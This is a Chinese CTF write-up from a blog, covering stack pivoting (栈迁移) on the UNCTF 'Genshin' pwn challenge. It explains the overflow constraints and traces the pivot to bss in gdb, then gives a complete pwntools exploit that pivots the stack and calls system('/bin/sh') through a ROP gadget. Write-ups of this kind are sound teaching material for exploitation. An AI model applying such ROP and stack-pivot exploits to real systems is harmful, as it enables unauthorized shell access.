UNCTF 原神 栈迁移

最新推荐文章于 2023-05-15 10:19:38 发布
最新推荐文章于 2023-05-15 10:19:38 发布
阅读量523 收藏
点赞数
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36995313/article/details/116336535
版权

原神-栈转移

先回忆一下学长上次的解题要点讲解:

  1. 数据在内存中,是没有指定格式的
  2. 一些整型数据,刚好可以对应字符串
  3. 利用已映射的字符串,作为system的参数

如果找不出到题目真正的考点,或者写不出自动抽卡脚本,就只有用栈转移的暴力方法来做了

程序分析

拿到程序,首先checksec检查一下
在这里插入图片描述
No PIE,NO canary,意味着可以少写一点exp
IDA ,F5直接定位到可导致栈溢出的函数:read()
在这里插入图片描述
因为只有NX保护,所以按理说是比较好getshell的,但是此处的read函数,只接受0x58个字符串,再来看看栈中,要达到溢出,至少要0x30个字符,能够利用的,只有40个byte
在这里插入图片描述
如果要用常规方法getshell,payload至少要有占据:

fake_ebp = p64(0xdeadbeef) 
pop_ret = p64(ga_addr) 
sh_addr = p64(bin/sh_addr) 
sys_addr = p64(system_addr) 
ret_addr = p64(read_addr)

40 byte根本不够用。这个时候,就能利用栈转移在另一个地方重新布置rop链了。具体原理见ctfwiki->Fancy ROP。

实现及exp

这里使用bss段作为栈迁移的地址,为了防止影响其他的数据,所以选择bss + 0x500作为栈转移地址

bss_addr = elf.bss(0x500)

system函数地址:

sys_addr = elf.symbols[“system”]

返回地址:
在这里插入图片描述
一般选择上一个函数结束的位置作为返回地址

payload1 = b'a' * 0x30 + payload = bytes('a' * 0x30,"utf-8") +p64(bss_addr) + p64(read_main)
payload = payload.ljust(0x58,b'b')

附加调试器在发送payload之前观察运行情况

gdb.attach( p )
在这里插入图片描述
可以看到,执行leave指令后,RBP变成了BSS段的地址,ret的返回地址为read_main的地址,而再往下,就会执行到read函数.
在这里插入图片描述
可以看到,再这个地方,read的地址地址参数也变成了bss段的地址,因为在这之前也有函数执行(所以就有mov rsp rbp的指令,每个函数结束后,栈帧又复原)和我们原来的bss段的地址相差E0 - B0 = 0x30,这个地方需要注意一下,后面布栈会用到

栈转移和控制程序执行流都成功一半,再来编写后面的payload,后面的payload主要有:

padding + pop + bss_addr + sys_addr

先放上已经写好的payload的调试执行流程

在这里插入图片描述
可以看到pop rdi的目标RSP指向的是0x6027e0,也就是最开始我们迁移到bss段地址的地方,但是read却把读入的字符串存储到0x6027b0,所以再写第二个payload的时候,要注意加上偏移,才能正确控制执行流,而且要确保padding + pop + bss_addr + sys_addr中,bss_addr的地址,和/bin/sh的地址一致

那么就有了payload2:

payload = b'a'* 48 + b'/bin/sh\x00' + p64(pop_rdi) + p64(bss_addr) + p64(sys_addr)
payload = payload.ljust(0x58,b'b')

exp:

#调试的时,gdb输入命令set follow-fork-mode parent
from pwn import *
context.log_level = "debug"

p = process("/mnt/c/Users/FALLEN/OneDrive/ctfprac/pwn/Genshin/GenshinSimulator")
elf = ELF("/mnt/c/Users/FALLEN/OneDrive/ctfprac/pwn/Genshin/GenshinSimulator")

bss_addr = elf.bss(0x500)
print(bss_addr)
sys_addr = elf.plt["system"]
read_main = 0x0000000000400C63
pop_rdi=0x400d13 #pop rdi ; ret

p.recv()
p.sendline('3')
p.recv()
p.sendline('1')
p.recv()
#gdb.attach(p)
payload = bytes('a' * 0x30,"utf-8") +p64(bss_addr) + p64(read_main)
payload = payload.ljust(0x58,b'b') #很重要,如果不填充,会影响下次一的数据输入
p.send(payload)
sleep(5)
payload = b'a'* 48 + b'/bin/sh\x00' + p64(pop_rdi) + p64(bss_addr) + p64(sys_addr) #一直填充到0x30,才能添入/bin/sh,应该是
payload = payload.ljust(0x58,b'b')                                                 #read的时候,执行了sub rsp 0x30,而bss_addr对应的地址又刚好是栈中RBP的地址
p.send(payload)
#gdb.attach(p)
p.interactive()
X_FALLEN
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[LitCTF 2023]原来你也玩原 (初级)
2301_80189829的博客
12-13 497
得 NSSCTF{YUANLAINIYEWANYUANSHENWWW}
[SWPUCTF 2021 新生赛]原来你也玩原
最新发布
lzx13290757580的博客
04-19 234
得到text再转换为zip发现为加密。打开zip文件得到flag。再用MP3stego工具。放入010把09改为00。先把zip转为MP3。
BugkuCTF-MISC题可爱的故事
am_03的博客
09-05 1038
下载文件,打开两张图片 根据评论提示是原里面的提瓦特字母 题目的提示说flag就藏在图片特殊文字里,还提到谷歌翻译,开始以为要把文字翻译成我们认识的,结果半天提取不出来文字,看了其他暗示,才知道这是类游戏里的文字,提瓦特文字,下面是它与英语字母的对照表(拷来的图片,呵呵) 题目提示提到flag 是大兔子说到的一句带有bugku的话,我们直接按照对照表找出bugku,因为猜想题目难度不会太难,就在每张图的开头结尾找bugku“提瓦特”的字样,然后真的在第一张图结尾找到bugku ...
迁移原理介绍与应用
weixin_39529207的博客
02-20 4821
本文将对CTF Pwn中「迁移」(又称「转移」)这一技术进行介绍与分析,希望读完本文后以下问题将不再困扰你: 什么是迁移迁移解决了什么问题? 怎么使用迁移这个技巧? 开始之前,有如下预备知识会极大提升你的阅读体验: CTF Pwn是在做什么?提权(Getshell)是什么意思? 在操作系统内存布局中,是一种怎样的结构,具有怎样的特点? x86中常用寄存器的名称与作用?函数调用的原理与过程是怎样的? 溢出攻击的核心技巧是什么? 溢出是怎么回事?  在预备知识的4个问
测中日记 LitCTF 密码学 WP
LyNzyds的博客
05-14 847
同上,我们得到本题flag:NSSCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}这样我们就得到了明文m :LitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}那么现在就需要翻译这串提瓦特文字,翻译这串文字只需要在浏览器里面搜索“提瓦特语言翻译”,我们就能够找到这样一张图。回归正题,关于RSA我并没有系统的学习过,所以我上网上搜索借鉴了其他师傅写的脚本修改了一下捏!
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
跨林ADMT迁移文件说明
06-28
跨林ADMT迁移文件说明,跨林ADMT迁移文件说明,跨林ADMT迁移文件说明,跨林ADMT迁移文件说明,跨林ADMT迁移文件说明,跨林ADMT迁移文件说明,跨林ADMT迁移文件说明,跨林ADMT迁移文件说明,跨林ADMT迁移文件说明,跨...
应用系统迁移方案.pdf
03-30
迁移测试验证迁移的成功,而迁移实施阶段则按照计划执行迁移,确保所有环节顺利进行。 【运营商接入链路(路由)迁移】 这部分涉及网络配置的调整,确保迁移后通信链路的稳定和效率。需要详细规划割接时间,避免对...
实战xtts迁移12C到19c
07-26
XTTS迁移 Oracle 数据库从 12C 到 19C XTTS(Cross Platform Transportable Tablespaces)是一种 Oracle 数据库迁移方法,它可以将数据库从一个平台迁移到另一个平台,包括跨操作系统、架构和版本的迁移。XTTS 的...
迁移(leave ret)(更适合pwn宝宝体质的迁移~)
Kata_Jhin的博客
05-15 1562
更适合pwn入门新手体质的迁移教程
ctf-misc-图片隐写
ZZZH666_的博客
11-19 627
ctf
迁移小总结
weixin_61283545的博客
04-24 401
[BUUCTF]PWN14——not_the_same_3dsctf_2016_mcmuyanga的博客-CSDN博客
迁移/劫持
chennbnbnb的博客
01-30 1007
例子 https://github.com/scwuaptx/HITCON-Training/tree/master/LAB/lab6 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int count = 1337 ; int main(){ if(count != 13...
pwn --迁移
zszcr的博客
04-07 6976
迁移主要是为了解决溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
迁移学习(buuctf [Black Watch 入群题])
像初雪一样自由洒落
03-14 977
i春秋的borrowstack是迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己迁移学的不是很好,只是知道大概的意思,但是还没有做过题,这次在看雪看到文章,就好好学一下,做到题啦!! 迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
linux内核rop姿势详解,[原创]rop链攻击原理与思路(x86/x64)
weixin_42397925的博客
05-02 778
rop链的基础原理rop是Return Oriented Programming(面向返回的编程)的缩写;根据函数调用规则,当刚跳转到其它函数去执行时,从被调用者的视角看:顶是返回地址,紧接着是自己的参数(X86架构下);然后,被调用者会对空间进行一系列操作,保存寄存器和存储临时变量,但在即将退出时会清理自己消耗的空间,以使其回到自己被调用前的空间,保持平衡;最后,被调用者以ret指令结...
UNCTF其余WP
doudoudedi
10-30 757
1.Pwn 1Babyrop 简单的一道溢出题目先泄露libc然后使用gadgetgetshell Exp如下: #name:doudoudedi #coding:utf-8 from pwn import * from LibcSearcher import * def debug(): gdb.attach§ #p=process(’./pwn4’) p=remote(‘101.71.29....
Pwn-转移(stack immigration)
CharlesGodX的博客
04-08 1542
0x00:前言 转移(stack immigration)主要是为了解决溢出可以溢出空间大小不足的问题,HITCON-Training-master 的 lab6 就是用的这个原理,我们来实践一下这道题目。 0x01:实例 题目链接: https://github.com/scwuaptx/HITCON-Training/blob/master/LAB/lab6/migration 运行一下程...
软硬件技术整体迁移策略
06-10
软硬件技术整体迁移是一项复杂的任务,需要考虑多方面的因素。以下是一些可能的迁移策略: 1. 逐步迁移:将整体迁移分为多个阶段,逐步完成各个技术迁移。这种策略适用于迁移规模较大的情况,可以逐步适应新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值